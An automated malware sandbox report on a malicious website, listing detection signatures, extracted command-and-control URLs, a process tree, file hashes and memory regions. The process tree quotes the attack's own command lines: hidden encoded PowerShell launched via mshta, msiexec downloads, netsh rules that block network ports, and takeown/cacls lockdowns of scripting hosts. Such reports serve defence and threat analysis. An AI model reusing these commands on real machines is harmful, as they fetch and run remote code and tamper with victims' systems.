Analysis

max time kernel: 93s
max time network: 141s
platform: windows10_x64
resource: win10v20201028
submitted: 01-12-2020 15:06

Static task: static1
URLScan task: urlscan1
Sample: https://speedjudgmentacceleration.com/index.php?key=total

Behavioral task: behavioral1
Sample: https://speedjudgmentacceleration.com/index.php?key=total
Resource: win10v20201028

General

Target: https://speedjudgmentacceleration.com/index.php?key=total
Sample: 201201-m2hmz24gps

Malware Config

Extracted: http://rawcdn.githack.cyou/up.php?key=1
Extracted: http://rawcdn.githack.cyou/up.php?key=2
Signatures

Blacklisted process makes network request 3 IoCs
Processes: powershell.exe, msiexec.exe
  flow  pid   process
  33    580   powershell.exe
  35    4448  msiexec.exe
  38    4448  msiexec.exe
Loads dropped DLL 5 IoCs
Processes: MsiExec.exe
  pid   process
  4560  MsiExec.exe (5 occurrences)
Modifies file permissions 1 TTPs 4 IoCs
Processes: takeown.exe
  pid   process
  1812  takeown.exe
  3120  takeown.exe
  2724  takeown.exe
  4464  takeown.exe
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: msiexec.exe
Drops file in Windows directory 14 IoCs
Processes: msiexec.exe
Modifies Internet Explorer settings
Processes: iexplore.exe, IEXPLORE.EXE
Modifies data under HKEY_USERS 58 IoCs
Processes: powershell.exe, msiexec.exe, MsiExec.exe
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes: powershell.exe, msiexec.exe
  pid   process
  580   powershell.exe (3 occurrences)
  2296  powershell.exe (3 occurrences)
  4448  msiexec.exe (2 occurrences)
  4676  powershell.exe (3 occurrences)
Suspicious use of AdjustPrivilegeToken 61 IoCs
Processes: powershell.exe (PIDs 580, 2296, 4676), msiexec.exe (PID 4448), takeown.exe (PIDs 1812, 3120, 2724, 4464)
Suspicious use of FindShellTrayWindow 1 IoCs
Processes: iexplore.exe
  pid   process
  4756  iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs
Processes: iexplore.exe, IEXPLORE.EXE
  pid   process
  4756  iexplore.exe (2 occurrences)
  3000  IEXPLORE.EXE (4 occurrences)
Suspicious use of WriteProcessMemory 120 IoCs
Processes: iexplore.exe, IEXPLORE.EXE, mshta.exe, powershell.exe, csc.exe, msiexec.exe, MsiExec.exe
Processes

iexplore.exe (PID 4756)
  Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://speedjudgmentacceleration.com/index.php?key=total
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  IEXPLORE.EXE (PID 3000)
    Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4756 CREDAT:82945 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    mshta.exe (PID 2232)
      Image: C:\Windows\SysWOW64\mshta.exe
      Command line: mshta vbscript:createobject("wscript.shell").run("PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand <base64 payload omitted>",0)(window.close)
      - Suspicious use of WriteProcessMemory
      powershell.exe (PID 580)
        Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand <base64 payload omitted>
        - Blacklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        powershell.exe (PID 2296)
          Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -EncodedCommand <base64 payload omitted>
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          csc.exe (PID 4396)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jpo3uasz\jpo3uasz.cmdline"
            - Suspicious use of WriteProcessMemory
            cvtres.exe (PID 1752)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E5B.tmp" "c:\Users\Admin\AppData\Local\Temp\jpo3uasz\CSC973F1932B1654E08907DC7EC26731FFC.TMP"

msiexec.exe (PID 4448)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Blacklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  MsiExec.exe (PID 4560)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 91EF5A0FB95B4E06F99567DD33A0D960
    - Loads dropped DLL
  MsiExec.exe (PID 1320)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding E6F321D9608E901BA7C432426033A885 E Global\MSI0000
    - Modifies data under HKEY_USERS
    - Suspicious use of WriteProcessMemory
    netsh.exe (PID 3060)
      Command line: "C:\Windows\SysWOW64\netsh.exe" interface ipv6 install
    netsh.exe (PID 2844)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
    netsh.exe (PID 1068)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
    netsh.exe (PID 4980)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    netsh.exe (PID 3992)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
    netsh.exe (PID 4228)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
    netsh.exe (PID 4328)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
    netsh.exe (PID 1356)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
    netsh.exe (PID 1048)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
    netsh.exe (PID 2924)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
    netsh.exe (PID 2208)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
    netsh.exe (PID 3084)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
    netsh.exe (PID 4836)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
    netsh.exe (PID 4716)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
    netsh.exe (PID 4596)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP
    netsh.exe (PID 968)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
    netsh.exe (PID 4688)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
    netsh.exe (PID 4164)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
    netsh.exe (PID 3300)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP
    netsh.exe (PID 436)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP
    netsh.exe (PID 2640)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
    netsh.exe (PID 1360)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
    netsh.exe (PID 2304)
      Command line: "C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
    takeown.exe (PID 1812)
      Command line: "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    cacls.exe (PID 4088)
      Command line: "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
    takeown.exe (PID 3120)
      Command line: "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    cacls.exe (PID 4704)
      Command line: "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2724 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N3⤵PID:4728
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4464 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N3⤵PID:4508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
MD5: b0c7467fe33f3b602ada20c9a6bbad69
SHA1: e8c445b8e2c458f0bd2ef0630bb361a90cde2582
SHA256: 4509f73a9fad9bf73937b4dab869e0a795ece76f051c99b1784647430cbd582e
SHA512: 46ce9962a81ca1f69c830fb0d657027bae3290d11dbeb0a093572067b568b3cd6f7d1b4c20f0bd372edcf730384c6fdc93e46eb10d0ca02747b3828fe99a243d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
MD5: 69cf9ac1f9a1e2092c332480ad782fb3
SHA1: 511f39527ff4aafe11a56c0be134ace6039a5e81
SHA256: 154a6c04abbd3c70491056bf6610eb1e198f35a556c387694294794aa0e32fc6
SHA512: fabdcf027caa0dfb6a0d51487af648a88b3fbdceec6d7c441255b06889f419e8b94ced309bc36e00151f04acac33f212f7cfe452c2e0581ace5d6610a729f7e4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\H61NFJ8T.cookie
MD5: 13319fbaf508404ab4af22d6a2ef3720
SHA1: c6707b9cb84d7c6769b911ed8bd2000b8159081e
SHA256: a85331e2888a86b26e8d9786040eae7607239691726604bdb268d2b0d4c03b7c
SHA512: 59b7a85fa39944a43027311d6a3ed17731a641ec1f9eddca1bbcbdc2f60d015bebbc0d014884d742809828b1c13fcb9166267c6701fdca45ecd022eca46d0367
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5: 5f640bd48e2547b4c1a7421f080f815f
SHA1: a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a
SHA256: 916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c
SHA512: a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e
-
C:\Users\Admin\AppData\Local\Temp\RES8E5B.tmp
MD5: d4d1cfd76bc37edbfba5ddf2f178f814
SHA1: 0c6ff54ea78ac221713b8738e56dce081aef0ffe
SHA256: 43ae3c2d3ab463ab2879f4228924f85a423abdb6b7de049d5253df8e8a148c40
SHA512: 321b9e64b70cd6d58568b7dfc034ef2d5499b57b5e9921dc5d75d938965847749e75d2e66faa3df375a7c2361cd9ded01781693b6bc64a9659c03c7ed711d318
-
C:\Users\Admin\AppData\Local\Temp\jpo3uasz\jpo3uasz.dll
MD5: 03b847190f00dec93d66132fff104449
SHA1: 06454a77b0217d24d579682682c05776d01d366a
SHA256: f0628cf2b1c7c7aedeb3880ece145df2184ea95dcf2319ee8ab3a1017b86011d
SHA512: 59e6595b7fc3458940eaf1bbc7507a5357950d7fd27e5ff68e40bcda477557d02e4143ad169686412863100e47fee330281abe2fa9720565902995fd42e529e5
-
C:\Windows\Installer\MSIA32C.tmp
MD5: 305a50c391a94b42a68958f3f89906fb
SHA1: 4110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256: f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512: fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
C:\Windows\Installer\MSIA466.tmp
MD5: 305a50c391a94b42a68958f3f89906fb
SHA1: 4110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256: f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512: fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
C:\Windows\Installer\MSIA4B5.tmp
MD5: 305a50c391a94b42a68958f3f89906fb
SHA1: 4110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256: f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512: fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
C:\Windows\Installer\MSIA533.tmp
MD5: d7ec04b009302b83da506b9c63ca775c
SHA1: 6fa9ea09b71531754b4cd05814a91032229834c0
SHA256: 00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4
SHA512: 171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c
-
C:\Windows\Installer\MSIA5A1.tmp
MD5: 305a50c391a94b42a68958f3f89906fb
SHA1: 4110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256: f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512: fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
\??\c:\Users\Admin\AppData\Local\Temp\jpo3uasz\CSC973F1932B1654E08907DC7EC26731FFC.TMP
MD5: f55ec145d7636c1c331d46a878065a3b
SHA1: a61ff623f56fd68d512792563fc9f956646b4a8e
SHA256: de54e09667e87563ecc26ee6dd1efbfeb65160750fc1f21f7bca1ee998c1aea0
SHA512: 6446b363c0a0789f31bca812000760efb520313ca101a2e88e0b3d9979c49d681f09f0bbe1ae3ad7057fbc3d1440ea670df1f59474e2b56ba3429e9e4ec89000
-
\??\c:\Users\Admin\AppData\Local\Temp\jpo3uasz\jpo3uasz.0.cs
MD5: 5cc66596055771b708c426b09785ed18
SHA1: fe11be68b5f5f01304e2c6b62458ba70ccc9a575
SHA256: 530c7292814fa916aa2846672d0bd17cb4ba54cb8f4f61b9d84e01a51b857c08
SHA512: dc0c9385a85ade45584fc782de2ab285d5ceb535d0ef6d19b610e34c1fde5e6e76fc88d0b6b0e9f922562c4fe26aaaccf6204fae5053e3679f3a104cbf2dfd5c
-
\??\c:\Users\Admin\AppData\Local\Temp\jpo3uasz\jpo3uasz.cmdline
MD5: 435a6c77afc2350309040f5fd11dfa37
SHA1: 4aa3e118bd9e2ba70512c7067f17b464fc10e2e3
SHA256: 34ee5f44167e3a9ca4cf0748868208f69767752d438734ecdd3403b7257497dc
SHA512: 4e5d27f89513063e542634f815338555c1be9018fa3e6e94f4481e77e6d01ad68052f65da769ed46921805c98520fe8083b1096f59e977718bb2d789fa264698
-
\Windows\Installer\MSIA32C.tmp
MD5: 305a50c391a94b42a68958f3f89906fb
SHA1: 4110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256: f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512: fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
\Windows\Installer\MSIA466.tmp
MD5: 305a50c391a94b42a68958f3f89906fb
SHA1: 4110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256: f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512: fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
\Windows\Installer\MSIA4B5.tmp
MD5: 305a50c391a94b42a68958f3f89906fb
SHA1: 4110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256: f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512: fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
\Windows\Installer\MSIA533.tmp
MD5: d7ec04b009302b83da506b9c63ca775c
SHA1: 6fa9ea09b71531754b4cd05814a91032229834c0
SHA256: 00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4
SHA512: 171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c
-
\Windows\Installer\MSIA5A1.tmp
MD5: 305a50c391a94b42a68958f3f89906fb
SHA1: 4110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256: f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512: fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
memory/436-71-0x0000000000000000-mapping.dmp
-
memory/580-13-0x0000000007680000-0x0000000007681000-memory.dmp
Filesize: 4KB
-
memory/580-14-0x00000000080C0000-0x00000000080C1000-memory.dmp
Filesize: 4KB
-
memory/580-11-0x0000000007870000-0x0000000007871000-memory.dmp
Filesize: 4KB
-
memory/580-10-0x0000000007800000-0x0000000007801000-memory.dmp
Filesize: 4KB
-
memory/580-17-0x0000000008D10000-0x0000000008D11000-memory.dmp
Filesize: 4KB
-
memory/580-9-0x0000000006F40000-0x0000000006F41000-memory.dmp
Filesize: 4KB
-
memory/580-8-0x0000000006FF0000-0x0000000006FF1000-memory.dmp
Filesize: 4KB
-
memory/580-7-0x0000000004850000-0x0000000004851000-memory.dmp
Filesize: 4KB
-
memory/580-16-0x00000000096A0000-0x00000000096A1000-memory.dmp
Filesize: 4KB
-
memory/580-6-0x000000006DC40000-0x000000006E32E000-memory.dmp
Filesize: 6.9MB
-
memory/580-12-0x0000000007940000-0x0000000007941000-memory.dmp
Filesize: 4KB
-
memory/580-5-0x0000000000000000-mapping.dmp
-
memory/580-15-0x0000000007FD0000-0x0000000007FD1000-memory.dmp
Filesize: 4KB
-
memory/968-67-0x0000000000000000-mapping.dmp
-
memory/1048-60-0x0000000000000000-mapping.dmp
-
memory/1068-53-0x0000000000000000-mapping.dmp
-
memory/1320-50-0x0000000000000000-mapping.dmp
-
memory/1356-59-0x0000000000000000-mapping.dmp
-
memory/1360-73-0x0000000000000000-mapping.dmp
-
memory/1752-34-0x0000000000000000-mapping.dmp
-
memory/1812-77-0x0000000000000000-mapping.dmp
-
memory/2208-62-0x0000000000000000-mapping.dmp
-
memory/2232-4-0x0000000000000000-mapping.dmp
-
memory/2296-19-0x000000006DC40000-0x000000006E32E000-memory.dmp
Filesize: 6.9MB
-
memory/2296-100-0x0000000009400000-0x0000000009401000-memory.dmp
Filesize: 4KB
-
memory/2296-18-0x0000000000000000-mapping.dmp
-
memory/2296-102-0x000000000A150000-0x000000000A151000-memory.dmp
Filesize: 4KB
-
memory/2296-38-0x0000000008D40000-0x0000000008D41000-memory.dmp
Filesize: 4KB
-
memory/2296-101-0x00000000005C0000-0x00000000005C1000-memory.dmp
Filesize: 4KB
-
memory/2304-74-0x0000000000000000-mapping.dmp
-
memory/2640-72-0x0000000000000000-mapping.dmp
-
memory/2724-81-0x0000000000000000-mapping.dmp
-
memory/2844-52-0x0000000000000000-mapping.dmp
-
memory/2924-61-0x0000000000000000-mapping.dmp
-
memory/3000-2-0x0000000000000000-mapping.dmp
-
memory/3060-51-0x0000000000000000-mapping.dmp
-
memory/3084-63-0x0000000000000000-mapping.dmp
-
memory/3120-79-0x0000000000000000-mapping.dmp
-
memory/3300-70-0x0000000000000000-mapping.dmp
-
memory/3992-56-0x0000000000000000-mapping.dmp
-
memory/4088-78-0x0000000000000000-mapping.dmp
-
memory/4164-69-0x0000000000000000-mapping.dmp
-
memory/4228-57-0x0000000000000000-mapping.dmp
-
memory/4328-58-0x0000000000000000-mapping.dmp
-
memory/4396-31-0x0000000000000000-mapping.dmp
-
memory/4464-83-0x0000000000000000-mapping.dmp
-
memory/4508-84-0x0000000000000000-mapping.dmp
-
memory/4560-39-0x0000000000000000-mapping.dmp
-
memory/4596-66-0x0000000000000000-mapping.dmp
-
memory/4676-86-0x000000006DC40000-0x000000006E32E000-memory.dmp
Filesize: 6.9MB
-
memory/4676-85-0x0000000000000000-mapping.dmp
-
memory/4688-68-0x0000000000000000-mapping.dmp
-
memory/4704-80-0x0000000000000000-mapping.dmp
-
memory/4716-65-0x0000000000000000-mapping.dmp
-
memory/4728-82-0x0000000000000000-mapping.dmp
-
memory/4836-64-0x0000000000000000-mapping.dmp
-
memory/4980-55-0x0000000000000000-mapping.dmp